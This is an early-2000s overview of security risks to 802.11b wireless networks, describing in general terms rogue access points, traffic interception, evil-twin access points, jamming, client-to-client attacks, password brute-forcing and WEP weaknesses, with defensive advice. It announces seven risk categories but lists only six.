Known Risks
Although attacks against 802.11b and other wireless technologies will undoubtedly increase in
number and sophistication over time, most current 802.11b risks fall into seven basic categories:
- Insertion attacks
- Interception and unauthorized monitoring of wireless traffic
- Jamming
- Client-to-Client attacks
- Brute force attacks against access point passwords
- Encryption attacks
Note that these classifications can apply to any wireless technology, not just 802.11b.
Understanding how they work and using this information to prevent their success is a good
stepping stone for any wireless solution.Insertion Attacks
Insertion attacks are based on deploying unauthorized devices or creating new wireless networks
without going through security process and review.
- Unauthorized Clients – An attacker tries to connect a wireless client, typically a laptop or PDA,
to an access point without authorization. Access points can be configured to require a
password for client access. If there is no password, an intruder can connect to the internal
network simply by enabling a wireless client to communicate with the access point. Note,
however, that some access points use the same password for all client access, requiring all
users to adopt a new password every time the password needs to be changed.- Unauthorized or Renegade Access Points – An organization may not be aware that internal
employees have deployed wireless capabilities on their network. This lack of awareness could
lead to the previously described attack, with unauthorized clients gaining access to corporate
resources through a rogue access point. Organizations need to implement policy to ensure
secure configuration of access points, plus an ongoing process in which the network is scanned
for the presence of unauthorized devices.Interception and Monitoring of Wireless Traffic
As in wired networks, it is possible to intercept and monitor network traffic across a wireless LAN.
The attacker needs to be within range of an access point (approximately 300 feet for 802.11b) for
this attack to work, whereas a wired attacker can be anywhere where there is a functioning
network connection. The advantage for a wireless interception is that a wired attack requires the
placement of a monitoring agent on a compromised system. All a wireless intruder needs is
access to the network data stream.There are two important considerations to keep in mind with the range of 802.11b access points.
First, directional antennae can dramatically extend either the transmission or reception ranges of
802.11b devices. Therefore, the 300 foot maximum range attributed to 802.11b only applies to
normal, as-designed installations. Enhanced equipment also enhances the risk. Second, access
points transmit their signals in a circular pattern, which means that the 802.11b signal almost
always extends beyond the physical boundaries of the work area it is intended to cover. This
signal can be intercepted outside buildings, or even through floors in multistory buildings. Careful
antenna placement can significantly affect the ability of the 802.11b signal to reach beyond
physical corporate boundaries.
- Wireless Packet Analysis – A skilled attacker captures wireless traffic using techniques
similar to those employed on wired networks. Many of these tools capture the first part of the
connection session, where the data would typically include the username and password. An
intruder can then masquerade as a legitimate user by using this captured information to hijack
the user session and issue unauthorized commands.- Broadcast Monitoring – If an access point is connected to a hub rather than a switch, any
network traffic across that hub can be potentially broadcasted out over the wireless network.
Because the Ethernet hub broadcasts all data packets to all connected devices including the
wireless access point, an attacker can monitor sensitive data going over wireless not even
intended for any wireless clients.- Access Point Clone (Evil Twin) Traffic Interception – An attacker fools legitimate wireless
clients into connecting to the attacker’s own network by placing an unauthorized access point
with a stronger signal in close proximity to wireless clients. Users attempt to log into the
substitute servers and unknowingly give away passwords and similar sensitive data.Jamming
Denial of service attacks are also easily applied to wireless networks, where legitimate traffic can
not reach clients or the access point because illegitimate traffic overwhelms the frequencies. An
attacker with the proper equipment and tools can easily flood the 2.4 GHz frequency, corrupting
the signal until the wireless network ceases to function. In addition, cordless phones, baby
monitors and other devices that operate on the 2.4 GHz band can disrupt a wireless network
using this frequency. These denials of service can originate from outside the work area serviced
by the access point, or can inadvertently arrive from other 802.11b devices installed in other work
areas that degrade the overall signal.Client-to-Client Attacks
Two wireless clients can talk directly to each other, bypassing the access point. Users therefore
need to defend clients not just against an external threat but also against each other.
- File Sharing and Other TCP/IP Service Attacks – Wireless clients running TCP/IP services
such as a Web server or file sharing are open to the same exploits and misconfigurations as
any user on a wired network.- DOS (Denial of Service) – A wireless device floods other wireless client with bogus packets,
creating a denial of service attack. In addition, duplicate IP or MAC addresses, both intentional
and accidental, can cause disruption on the network.Brute Force Attacks Against Access Point Passwords
Most access points use a single key or password that is shared with all connecting wireless
clients. Brute force dictionary attacks attempt to compromise this key by methodically testing
every possible password. The intruder gains access to the access point once the password is
guessed.In addition, passwords can be compromised through less aggressive means. A compromised
client can expose the access point. Not changing the keys on a frequent basis or when
employees leave the organization also opens the access point to attack. Managing a large
number of access points and clients only complicates this issue, encouraging lax security
practices.Attacks against Encryption
802.11b standard uses an encryption system called WEP (Wired Equivalent Privacy). WEP has
known weaknesses (see http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html for more
information), and these issues are not slated to be addressed before 2002. Not many tools are
readily available for exploiting this issue, but sophisticated attackers can certainly build their own.
Note: This site is accessible to any browser, although, it will look much better in a browser that supports web standards.
To view this page properly, please upgrade your browser. We recommend:
Mozilla Firefox (PC/Mac/Linux download)
Opera (PC/Mac/Linux/Solaris download)
Safari (Mac download)